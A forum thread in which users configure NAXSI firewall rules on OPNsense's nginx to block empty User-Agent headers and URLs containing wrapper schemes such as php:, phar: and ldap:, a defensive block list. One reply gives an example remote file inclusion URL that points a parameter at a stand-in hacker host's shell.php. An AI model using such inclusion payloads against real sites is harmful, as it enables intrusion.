OPNsense Forum
English Forums => Web Proxy Filtering and Caching => Topic started by: akong77 on November 05, 2020, 02:42:39 am
-
Hello,
I know nginx can use hook to add block empty user-agent.I want know naxsi could support it?
-
it should
may be something like:
MainRule negative id:1700 "rx:^(?!\s*$).+" "msg:Empty_UA" "mz:$HEADERS_VAR_X:User-Agent"
not tested
-
OK,I will test it.Thanks a lot.
-
I test it.It's can't block it.
-
test it. works
curl -H "User-Agent;" http://myCA_CRL_URL
*32507 NAXSI_EXLOG: ip=some_ip&server=my_serever&uri=%2Fcrl_file&id=1700&zone=HEADERS&var_name=user-agent&content=, client: some_ip, server: my_server, request: "GET /my.crl HTTP/1.1", host: "my_server
-
If you try
curl -A '' -H 'User-Agent;' http://web -I
-
Sorry,I make mistake.It's can block it.Thanks a lot.
I want know about naxsi.It's can choose drop connection this option.What the different block request and drop connection?I test it.I feel no different.
-
https://github.com/nbs-system/naxsi/wiki/rules-bnf
specifiy an action such a BLOCK (blocks the request in non-learning mode) or DROP (blocks the request even in learning mode)
DROP is not "DROP connection". its block even in learning mode
-
So,Whatever choose block request or drop connection it's always show opnsense request denied webpage.
Right?
-
yep
-
it should
may be something like:
MainRule negative id:1700 "rx:^(?!\s*$).+" "msg:Empty_UA" "mz:$HEADERS_VAR_X:User-Agent"
not tested
Hello,I test it.
If I use browers like firefox to see http://ab.aspa.idv.tw.It's also show Request Denied.
You can check http://ab.aspa.idv.tw
-
and whats in the "HTTP Error logs" for this requests?
-
*19 NAXSI_FMT: ip=219.84.34.52&server=ab.aspa.idv.tw&uri=/&learning=0&vers=0.56&total_processed=12&total_blocked=10&block=1&cscore0=$policy20906cd5e25e413f9fe6e733c38d3586&score0=16&zone0=HEADERS&id0=15001&var_name0=user-agent&zone1=HEADERS|NAME&id1=15001&var_name1=user-agent, client: 219.84.34.52, server: ab.aspa.idv.tw, request: "GET / HTTP/1.1", host: "ab.aspa.idv.tw"
*19 NAXSI_FMT: ip=219.84.34.52&server=ab.aspa.idv.tw&uri=/favicon.ico&learning=0&vers=0.56&total_processed=13&total_blocked=11&block=1&cscore0=$policy20906cd5e25e413f9fe6e733c38d3586&score0=16&zone0=HEADERS&id0=15001&var_name0=user-agent&zone1=HEADERS|NAME&id1=15001&var_name1=user-agent, client: 219.84.34.52, server: ab.aspa.idv.tw, request: "GET /favicon.ico HTTP/1.1", host: "ab.aspa.idv.tw", referrer: "http://ab.aspa.idv.tw/"
-
zone1=HEADERS|NAME
and how exactly rule 15001 looks like?
and can you enable "Extensive Naxsi Log" in server properties and post NAXSI_EXLOG log for blocked request?
-
MainRule id:15001 "rx:^(?!\s*$).+" "msg:Empty UA" "mz:$HEADERS_VAR_X:User-Agent" "s:$policy20906cd5e25e413f9fe6e733c38d3586:8";
-
and can you enable "Extensive Naxsi Log" in server properties and post NAXSI_EXLOG log for blocked request?
Where is these setup?on opnsense?or web server?
-
MainRule id:15001 "rx:^(?!\s*$).+" "msg:Empty UA" "mz:$HEADERS_VAR_X:User-Agent"
forgot to negate? now you blocking any request with non-empty UA header
MainRule negative id:15001 "rx:^(?!\s*$).+"
"negative" to block request that does not satisfy non-emtpy UA
Where is these setup?on opnsense?or web server?
OPN->services->Nginx->configuration->Edit HTTP Server->advanced mode
-
Ohh...Sorry,I miss this option.Thanks a lot.
-
Please see follow:
MainRule id:10000 "str:gopher|doc|php|glob|file|phar|zlib|ftp|ldap|dict|ogg|data\:\/" "msg:URL charset" "mz:URL" "s:$policy1a275df7733e4aef813ecb4917637d
40:8"
I want block some charset on url.Could I set wrong?
-
"str:gopher|doc|php|glob|file|phar|zlib|ftp|ldap|dict|ogg|data\:\/"
since you use regex its should be "rx:" not "str:"
what "\:\/" part for?
-
Sorry,the full rule I fix it.
MainRule id:10000 "rx:(gopher|doc|php|glob|file|phar|zlib|ftp|ldap|dict|ogg|data)\:\/" "msg:URL charset" "mz:URL" "s:$policy1a275df7733e4aef813ecb4917637d40:8";
I want block url string have like ftp:/ or ldap:/ this string.I has edit to rx.Is right?
-
regex looks fine but
can you show an example of url you want to block?
URL zone contain string between server name and first "?" sign (ie if https://forum.opnsense.org/index.php?action=post requested then URL = /index.php, "action" is Argument. Arguments of POST request is in BODY zone).
so what exactly you want to block?
-
like
http://url/php:/
-
hm. if the question is theoretical, then yes. rule should work.
but RFI (remote file inclusion) works by parameters (arguments), not url itself
(ie http://www.example.com/vuln_page.php?file=http://www.hacker.com/shell.php)
and naxsi have examples of obvious rfi protecion (IDs:1100-1199)
-
Hello,
Could I redirect client 403 page when rule match?
-
I did not understand the question.
you want to send 403 status? change html page?
yes you can
https://github.com/nbs-system/naxsi/wiki/directives#deniedurl
when rule match?
when access blocked.
DeniedUrl is directive in location block. you cant set it for one rule